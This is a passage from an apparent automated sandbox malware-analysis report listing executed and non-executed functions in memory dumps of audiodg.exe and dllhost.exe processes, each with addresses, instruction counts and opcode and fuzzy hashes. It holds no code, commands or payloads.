Instruction Fuzzy Hash: 3001483095D68E9FE752FBB888585A97BE0FF5A341F0544BAD40CC70A2EB38A854C715

Function 00007FF848F1C989 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46186174a738710bec2dcca43045293d5b84d7f4552ac1a6da53638d002bf79
Instruction ID: 92b9bfd19470ff666e675f8af762bc258fe9d9bc979040a8826195e2bdae721b
Opcode Fuzzy Hash: c46186174a738710bec2dcca43045293d5b84d7f4552ac1a6da53638d002bf79
Instruction Fuzzy Hash: C811CE3080C68E8FDB49FF24C4992B97FA1FF29341F9400BAD409C61D2EB35A850C785

Function 00007FF848F1BEF5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79f853f2f8b6752dc570027d9213ef43f6ac3af5cf9656e1aa39c8f613e5c79
Instruction ID: a414564beea9dfa364c55d12f0add1ad6fb675ed0ba65e341510e811b4f42019
Opcode Fuzzy Hash: c79f853f2f8b6752dc570027d9213ef43f6ac3af5cf9656e1aa39c8f613e5c79
Instruction Fuzzy Hash: 90015A7092C64E8FE741FF6488496E97BE0FF19341F0949B6E448C61E2EB38A994CB45

Function 00007FF848F22771 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdfb2a3ccb7c25bf3352e0c4714bdaf1f0650da085eb6f787aa14c9591ba5ee
Instruction ID: bdeb040c887797f89338d96d7d31208413bdda107b9ec4bca75ba13bfb696fa2
Opcode Fuzzy Hash: 4cdfb2a3ccb7c25bf3352e0c4714bdaf1f0650da085eb6f787aa14c9591ba5ee
Instruction Fuzzy Hash: 5201FC3090D68A8FDB49EFA4C4682BABBA1FF18300F0008BEE00AC60D2DF36A140C740

Function 00007FF848F105D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd313c1d2acccf73b5b2d2363fdb8153441fc2d2518e3c36126627d1483faba7
Instruction ID: 02abfc6ea6b8d918bac132b4b233c7e4d5d89cdd686b8819c3e376d7405a6b6b
Opcode Fuzzy Hash: bd313c1d2acccf73b5b2d2363fdb8153441fc2d2518e3c36126627d1483faba7
Instruction Fuzzy Hash: 44019A3090990E8FEB88EF24C4596BABBA1FF58345F10547ED40EC21C2DB32A990CB48

Function 00007FF848F1C15A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2b6544e407c48af8ce84c4c215a7364988a0ba0b3dff5d3f18b974c5a900d4
Instruction ID: 3e6a468d86f1fe00cb690b8f574171d67eefa683fa0a06fb7682faafd7c9cc94
Opcode Fuzzy Hash: 3f2b6544e407c48af8ce84c4c215a7364988a0ba0b3dff5d3f18b974c5a900d4
Instruction Fuzzy Hash: 2701483095C94E9EEB98FF6884582BDBAE0FF18341F50087AE81AD2191EB71A950CB44

Function 00007FF848F1285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7446781f2496c919ae2c88e016eebffe45eafde0929041e361243e65a3ef23cd
Instruction ID: 9ba1ed8f581ce742fa098ab39fec836d8a793d7aa7e8cf0304d1bf967646cefb
Opcode Fuzzy Hash: 7446781f2496c919ae2c88e016eebffe45eafde0929041e361243e65a3ef23cd
Instruction Fuzzy Hash: EA018B3090D64E9FEB51FBA8889D6B97BE0FF59351F5544B7D408C60A2EF38E8448704

Function 00007FF848F279D9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9997f20b69df738bc5bf3f6b023338ddd1995a468321241586e72c4ff5943714
Instruction ID: 90d79ddded3369685d09274d93ba7b4743646b7da4f2a1d1a05e9670915901d0
Opcode Fuzzy Hash: 9997f20b69df738bc5bf3f6b023338ddd1995a468321241586e72c4ff5943714
Instruction Fuzzy Hash: CF01D431C5DA8A5FE742BB34989A2A97BE0FF09341F0508F3D408C70E2EB39E5448701

Function 00007FF848F12EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736a03ef64cb2f4aca4fb93d8091ddf099768dbbdcb8182763c209b044361836
Instruction ID: 374000839110052f1792d5a618425db3812719fb7fe10628f8c0cfa0c78bcec3
Opcode Fuzzy Hash: 736a03ef64cb2f4aca4fb93d8091ddf099768dbbdcb8182763c209b044361836
Instruction Fuzzy Hash: 4A01713191D6894FE742FBB488595A97BE0EF5A340F0604F6D408CB0E6EB38A844C715

Function 00007FF848F11CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f793a950997cccc516ebe6d60e81f5925c2dbbb9fc29f80cee099341a8930d1
Instruction ID: 4e7c56c5234e285599276f46358f60bbfb0e69caefb5bd2c0d8fe49c24f8b8c0
Opcode Fuzzy Hash: 9f793a950997cccc516ebe6d60e81f5925c2dbbb9fc29f80cee099341a8930d1
Instruction Fuzzy Hash: 3C01813080D68E8FEB59EF2488592FA7BA0FF55341F4414BAE808C21D2DB769990C744

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df12582c263a1a0377656d002dcefebd7dd99e6049587dfeeb0025fc773aa26
Instruction ID: 37822abbcc4d1ee92253577ba5ff98e4974758f570ad5a827b46416169419fa3
Opcode Fuzzy Hash: 7df12582c263a1a0377656d002dcefebd7dd99e6049587dfeeb0025fc773aa26
Instruction Fuzzy Hash: 8F018C30819A0E9EEB49FBA4C4582BE77A2FF18345F10087EE41EC25D1DF35A990CB04

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc1c50aebfa55a9c09473c8decc4a4eac84e3a06d99c6aeb846f14e49c3fd58
Instruction ID: 9fd982e8349309e59296aa72dc17bc16b96aa3c6b0e6ddc1fee22b776d236d66
Opcode Fuzzy Hash: bbc1c50aebfa55a9c09473c8decc4a4eac84e3a06d99c6aeb846f14e49c3fd58
Instruction Fuzzy Hash: D8018C30819A0E9FEB49FBA4C4582BAB7A0FF18355F20087EE40EC21D1DF36A950C704

Function 00007FF848F27BA0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610c0e24363747e512c9196676b00ae39ea590edeb9f5b6547d6ae3d16c314ca
Instruction ID: 0d3f11d260aa877211425ab7e90fc1f4bb2b7b453f7a1b3eaf5c614bd4626a57
Opcode Fuzzy Hash: 610c0e24363747e512c9196676b00ae39ea590edeb9f5b6547d6ae3d16c314ca
Instruction Fuzzy Hash: 4211F370D0861ACFEB18EF95E4943FCBAB0AF08361F54423AE019B22C1DB785885CF19

Function 00007FF848F22EB8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7651c1242937bb129378545d690f173221bb8ac8700c4a4ff052b399b3421b
Instruction ID: 28b85c027a3b85cef1dcfd0f4cfca79a49935cc2b92f3aaed0d8024939567fc0
Opcode Fuzzy Hash: cd7651c1242937bb129378545d690f173221bb8ac8700c4a4ff052b399b3421b
Instruction Fuzzy Hash: B201AF70E1892D8EEBA4FB6888993ACF6F1FB59340F5040A9D00DE3282DF346D859F04

Function 00007FF848F1AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e556b61ff82788a3098ced2bf2aaf2221a22778b710f5648b84efdb86922aefc
Instruction ID: 23415c3ca889a39be02362c3ae7f9ee4d5672cb588867010acb8c2acae405b95
Opcode Fuzzy Hash: e556b61ff82788a3098ced2bf2aaf2221a22778b710f5648b84efdb86922aefc
Instruction Fuzzy Hash: EDF049B096CA4E9FEB51FB7884495BABAE0EF18341F0509B6E40DC60A5EF34A994C644

Function 00007FF848F105D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d464691a04218e0d0d23469f193fe5240b083112915763c2bf1cbca55be85c2
Instruction ID: becd1eb529ff7bb2032a1178123141f63516985d3c5c0fe4ec71d9a2306c934a
Opcode Fuzzy Hash: 7d464691a04218e0d0d23469f193fe5240b083112915763c2bf1cbca55be85c2
Instruction Fuzzy Hash: D1F0963081E64E8FEB45FF6494152FA7BA4FF15345F50147AE80DC21C2DB35A990C748

Function 00007FF848F12779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83d6082a5dd9f6595d326453c20a52ad4a40ffbab40235ea2120f8127eeba1c
Instruction ID: 0d9120e9d057a19f6b7b5d4ebf1974c2b41433355fcb16976089a87bc3436bf6
Opcode Fuzzy Hash: b83d6082a5dd9f6595d326453c20a52ad4a40ffbab40235ea2120f8127eeba1c
Instruction Fuzzy Hash: 7CF0C23180E38E8FEB5AEF7488182FA3B61FF16301F4504BAD409C64D2DB38A854C741

Function 00007FF848F10FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075faaf8399a932725628eb8f575dc8b376b45cf4e4693149a07ede6a475f6d0
Instruction ID: c196b6c201dcf88ee115764d4b5624c38646e18b41fcd2f3743f458f2c2ee243
Opcode Fuzzy Hash: 075faaf8399a932725628eb8f575dc8b376b45cf4e4693149a07ede6a475f6d0
Instruction Fuzzy Hash: 2C01E830D096298FEB50FB64C8447EDB7F1EB54341F1042A9D409E7282DF386D848F58

Function 00007FF848F212D0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fecdc4bfa0fdfb7caec53eec6a9868c9d1d82530c121a1bdc6f7cef2a221db8
Instruction ID: 803376db820a830f0bd7d1efc5f929f6009b5ea5c2bb2e0a1cb476e9b2063154
Opcode Fuzzy Hash: 7fecdc4bfa0fdfb7caec53eec6a9868c9d1d82530c121a1bdc6f7cef2a221db8
Instruction Fuzzy Hash: 61F0FE3091864E8EEB84EF6898082FE76E4FF18305F40053AE81DD21D0EB746594C745

Function 00007FF848F1BC41 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff32986c574e0e92511d5bd656f1847866a7eca7d7ffa88dfecfcd6a9435976
Instruction ID: 2767d0b7a69bbd948c7cda4fc5cc9a3f983c1f9a437ae6a6d19a76f52fc2634c
Opcode Fuzzy Hash: 2ff32986c574e0e92511d5bd656f1847866a7eca7d7ffa88dfecfcd6a9435976
Instruction Fuzzy Hash: ABF0F970D1C41E8EEBA4EB188444BF973A1EB58340F5446B6D40DD3185DF38AD818F44

Function 00007FF848F127ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0661a2ee7d6ffd9afc3a1bfd53a9de0ccacb782e75f8ac95605816d4a1051ed3
Instruction ID: 962ba9fd8c02b9640b666e41dc6815de756835a85ee4f98abeeaba374005ec2e
Opcode Fuzzy Hash: 0661a2ee7d6ffd9afc3a1bfd53a9de0ccacb782e75f8ac95605816d4a1051ed3
Instruction Fuzzy Hash: 82F0903080E78A8FEB59EBA484592B97BA0FF15351F4404BEE809C61D2EB399854C741

Function 00007FF848F24000 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3d4c80a983d21f3c44a086754706c015e9e8d5f0ec39f9cb1615dc4fc4cfc2
Instruction ID: 497c72fb6d35d0af0213b2f71fe8692444c46e1d929cfb40ecfe725b88cb2e7c
Opcode Fuzzy Hash: 1e3d4c80a983d21f3c44a086754706c015e9e8d5f0ec39f9cb1615dc4fc4cfc2
Instruction Fuzzy Hash: DBF01C31D1851E9EEB90FB68D4495BA77E4FF28351F104972D40DC7195EF34E1848704

Function 00007FF848F12450 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction ID: cc83d3627836835a78aed240433911e727dda9f33909a6061eee2d8624080c0c
Opcode Fuzzy Hash: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction Fuzzy Hash: B8F0C930D085298EEB64FB60C885BE8B3B1AB54341F1041BAD40D922D2DF786E94CF45

Function 00007FF848F1BD69 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab951f79a44c8e9ebc573eeb573e4c19a57f16e5cff4e55e906be92bfa61f174
Instruction ID: bf9faabe82fe9c6afe06d51eefdcc107a32bab20e819ffdfc6387f7552cf222e
Opcode Fuzzy Hash: ab951f79a44c8e9ebc573eeb573e4c19a57f16e5cff4e55e906be92bfa61f174
Instruction Fuzzy Hash: 74F07970D1851E8EEBA0EB94C8557ADB6B1FF44340F4045F6910DE2292DF341E848F14

Function 00007FF848F217CC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7999df847b98cd6ca3d66839d414f87d85e3bc7979f3786e9faa51c363503a04
Instruction ID: fda0b3de2e632e20ec03ad003eb1c5d2d878281a38f882b9f0ded860a71ad93c
Opcode Fuzzy Hash: 7999df847b98cd6ca3d66839d414f87d85e3bc7979f3786e9faa51c363503a04
Instruction Fuzzy Hash: E6F03935E0D2298FCB98DF54D8A46FDB7A5EF81350F1040BAE10E9B291CB342A98CB45

Function 00007FF848F25810 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b2b1482963913910b075b640d8346aa358650faef6f75c57fbe3cb65555e14
Instruction ID: 9fb6ecdd12674323952f830061c9dd20e291030e675b0682aea3d6273395addd
Opcode Fuzzy Hash: 85b2b1482963913910b075b640d8346aa358650faef6f75c57fbe3cb65555e14
Instruction Fuzzy Hash: 39D01271C08B4A8FEB84DF5C84892A8BBF1FB98708B10016AC019D3244EF30D8028B40

Non-executed Functions

Function 00007FF848F1387E Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

8s], xrefs: 00007FF848F138D4
.s]I, xrefs: 00007FF848F13954
0s]I, xrefs: 00007FF848F13944
/s]I, xrefs: 00007FF848F13924

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID: .s]I$/s]I$0s]I$8s]
API String ID: 0-2350946736
Opcode ID: c051912f9780aff62485e6aa53fbf5db36af79c77ca58aa7a3707c076bb2b495
Instruction ID: 74dbacd3a7f5b6e4a3f873a256b001197b80b562596f7e5a6a5f43e3d79cd88a
Opcode Fuzzy Hash: c051912f9780aff62485e6aa53fbf5db36af79c77ca58aa7a3707c076bb2b495
Instruction Fuzzy Hash: A0319CA281E6D25FE313577C1C289657FA1EF63B9075941FBC184CB0EBD60D9E0A8392

Function 00007FF848F21609 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F214A9
#, xrefs: 00007FF848F21C66
!, xrefs: 00007FF848F2164D
-, xrefs: 00007FF848F21CAD

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID: !$#$-$/
API String ID: 0-2869350023
Opcode ID: 2a689345eb314d5653b631e9821f604c1cdcf77e08910d5a3b4252b029223d9a
Instruction ID: 4dc157b88735d88d2c1e95a45c0c8234624d77bbefafe94e982e10d522a91dd2
Opcode Fuzzy Hash: 2a689345eb314d5653b631e9821f604c1cdcf77e08910d5a3b4252b029223d9a
Instruction Fuzzy Hash: 1031C570D0961D8FEBA8EF54D8A47E8B7B1FB59305F2001A9D40DE7291CB356A80CF44

Function 00007FF848F1F3C5 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

\, xrefs: 00007FF848F1F255
!, xrefs: 00007FF848F1F3CF
,, xrefs: 00007FF848F1F262
2, xrefs: 00007FF848F1F438

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f1f000_audiodg.jbxd

Similarity

API ID:
String ID: !$,$2$\
API String ID: 0-4146109853
Opcode ID: 6ceb70c887e8c3f82aeedb17e0ec66048fb0237830a84b27f74cfbd6bd6093ee
Instruction ID: af69a8f5fde3b248ceec71cbbede068471309a98c34fd3351ae61044b6a88d5e
Opcode Fuzzy Hash: 6ceb70c887e8c3f82aeedb17e0ec66048fb0237830a84b27f74cfbd6bd6093ee
Instruction Fuzzy Hash: 31114C70D0862A8FEB64EF54D8947AEB7B2EF94340F1081A9D40D62285CF381D85CF44

Analysis Process: dllhost.exePID: 7216, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F13565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63e849d346f847adaee42eb8f89942a3b8bca2957ba8862ab41f66b4b100517
Instruction ID: 6c6f19ad56376f9029b5d33daa102a60e7bbea677025eea6b4fcedd102930b5f
Opcode Fuzzy Hash: a63e849d346f847adaee42eb8f89942a3b8bca2957ba8862ab41f66b4b100517
Instruction Fuzzy Hash: 2791AD71E1C94E8FE784EB6CC8187A9BBE1FB9A395F50017AC00DD32C6DF6828458B55

Function 00007FF848F10A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F10A70

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 86cea5a219d849fa25e649c190ea6367b2f9ec43e81dd01e69af43263d13602e
Instruction ID: 6c6d2c38260b1023cae9f07229d00d6974d8148deaa3185a49432415641b8781
Opcode Fuzzy Hash: 86cea5a219d849fa25e649c190ea6367b2f9ec43e81dd01e69af43263d13602e
Instruction Fuzzy Hash: C6116A30D0CA5E9EE780FB68C8492B97BE0FFA8381F4405B6D809C7192EF38A9448700

Function 00007FF848F1123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F112AD

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: bd246b3b40616cd5806456f5f5e4b936573ee432c1c68bf2cb75c85d8f2fdafa
Instruction ID: 59e420d3da0b8648ff7755b34c14c5f12d1bc2c2f64e90152eb5d66d88cb7bb2
Opcode Fuzzy Hash: bd246b3b40616cd5806456f5f5e4b936573ee432c1c68bf2cb75c85d8f2fdafa
Instruction Fuzzy Hash: 9B11B230D0D59E8EEB99FB6884596B97BE0FF66341F4415BAD00AC60D2EF255884C714

Function 00007FF848F11250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F112AD

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 243f765abfc68f60622a4337f7c55dc0b0d13763b109342c98656871fc129ce7
Instruction ID: 3a0628975e96b354667c55ebd7b7a3e137eebbf65dd67573b3df0e1becedb54f
Opcode Fuzzy Hash: 243f765abfc68f60622a4337f7c55dc0b0d13763b109342c98656871fc129ce7
Instruction Fuzzy Hash: 99F0AF30E1D5AF8EEBD8BB6898183BA77E4FF56355F04153AD40DC20D2EF2818948224

Function 00007FF848F105A0 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32f2b9b9df4d89e31faa4ea8fdfb6103af8d9e499e281a004824b94aa60f6f40
Instruction ID: 298ddd62e310dc013a843cf764dfe60cbfe7ff0485aec32817a906f8d915ca13
Opcode Fuzzy Hash: 32f2b9b9df4d89e31faa4ea8fdfb6103af8d9e499e281a004824b94aa60f6f40
Instruction Fuzzy Hash: 6991F423D0E5E29EE251777C78161F92BA0FFD27A4F0805B7D4888E0D7EE1C5C4A8299

Function 00007FF848F10638 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d228288eb849603df186133a5420770cb12d4518457507f1cfa59e071be3531b
Instruction ID: f38f12e3869879333271e81e1c1c296720e4ad5959461352f84d963cf5a24ce6
Opcode Fuzzy Hash: d228288eb849603df186133a5420770cb12d4518457507f1cfa59e071be3531b
Instruction Fuzzy Hash: E481F623D0E5E28EE255777C78151F92BA0FFD27A5F0805B7D4888A0D7DE2C5C4A8399

Function 00007FF848F10615 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2169719932.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f10000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2cf7a0e106d5b4dd047ab8490c1d1ad06cec1a70b4c4fbab411a34e543a9f2
Instruction ID: 9ddd905e94ad51cbb1d94078663ff3c194414c1186ca9e9c652ee012418b1213
